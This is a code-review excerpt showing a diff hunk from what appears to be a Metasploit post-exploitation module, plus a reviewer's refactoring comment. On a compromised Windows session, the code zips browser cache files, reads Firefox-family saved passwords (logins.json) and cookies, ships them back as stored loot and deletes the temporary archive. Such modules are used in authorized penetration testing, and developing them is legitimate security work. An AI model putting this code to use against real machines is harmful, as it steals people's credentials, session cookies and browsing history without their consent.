modules/post/windows/gather/enum_browsers.rb

```diff
@@ -0,0 +1,896 @@
+
+    if file_count > 0
+      temp_dir = session.fs.file.expand_path('%TEMP%')
+      random_name = Rex::Text.rand_text_alpha(8)
+      zip_file_path = "#{temp_dir}\\#{random_name}.zip"
+
+      zip = Rex::Zip::Archive.new
+      progress_interval = (file_count / 10.0).ceil
+
+      files_to_zip.each_with_index do |file, index|
+        file_content = read_file(file)
+        zip.add_file(file, file_content) if file_content
+
+        if (index + 1) % progress_interval == 0 || index == file_count - 1
+          progress_percent = ((index + 1) * 100 / file_count).to_i
+          print_status("Zipping progress: #{progress_percent}% (#{index + 1}/#{file_count} files processed)")
+        end
+      end
+
+      write_file(zip_file_path, zip.pack)
+      print_status("Cache for #{browser} zipped to: #{zip_file_path}")
+
+      browser_clean = browser.gsub('\\', '_').chomp('_')
+      timestamp = Time.now.strftime('%Y%m%d%H%M')
+      ip = session.sock.peerhost
+      cache_local_path = store_loot(
+        "#{browser_clean}_Cache",
+        'application/zip',
+        session,
+        read_file(zip_file_path),
+        "#{timestamp}_#{ip}_#{browser_clean}_Cache.zip",
+        "#{browser_clean} Cache"
+      )
+
+      file_size = ::File.size(cache_local_path)
+      print_good("└ Extracted Cache to #{cache_local_path} (#{file_size} bytes)") if file_size > 2
+
+      session.fs.file.rm(zip_file_path)
+    else
+      print_status("No Cache files found for #{browser}.")
+    end
+  end
+
+  def extract_gecko_data(profile_path, browser)
+    process_gecko_logins(profile_path, browser)
+    process_gecko_cookies(profile_path, browser)
+    process_gecko_download_history(profile_path, browser)
+    process_gecko_keyword_search_history(profile_path, browser)
+    process_gecko_browsing_history(profile_path, browser)
+    process_gecko_bookmarks(profile_path, browser)
+    process_gecko_extensions(profile_path, browser)
+  end
+
+  def process_gecko_logins(profile_path, browser)
+    logins_path = "#{profile_path}\\logins.json"
+    return unless file?(logins_path)
+
+    json_data = read_file(logins_path)
+    browser_clean = browser.gsub('\\', '_').chomp('_')
+    timestamp = Time.now.strftime('%Y%m%d%H%M')
+    ip = session.sock.peerhost
+    file_name = store_loot("#{browser_clean}_Passwords", 'application/json', session, json_data, "#{timestamp}_#{ip}_#{browser_clean}_Passwords.json", "#{browser_clean} Passwords")
+    file_size = ::File.size(file_name)
+
+    print_good("└ Extracted Passwords to #{file_name} (#{file_size} bytes)") if file_size > 2
+  end
+
+  def process_gecko_cookies(profile_path, browser)
+    cookies_path = "#{profile_path}\\cookies.sqlite"
+    if file?(cookies_path)
+      extract_sql_data(cookies_path, 'SELECT host, name, path, value, expiry FROM moz_cookies', 'Cookies', browser)
+    elsif datastore['VERBOSE']
+      print_error("Cookies not found at #{cookies_path}")
```

Comment:
I think this can be removed now if we bake the print logic into `extract_sql_data` like in the code snippet I sent; but let me know if it's not quite right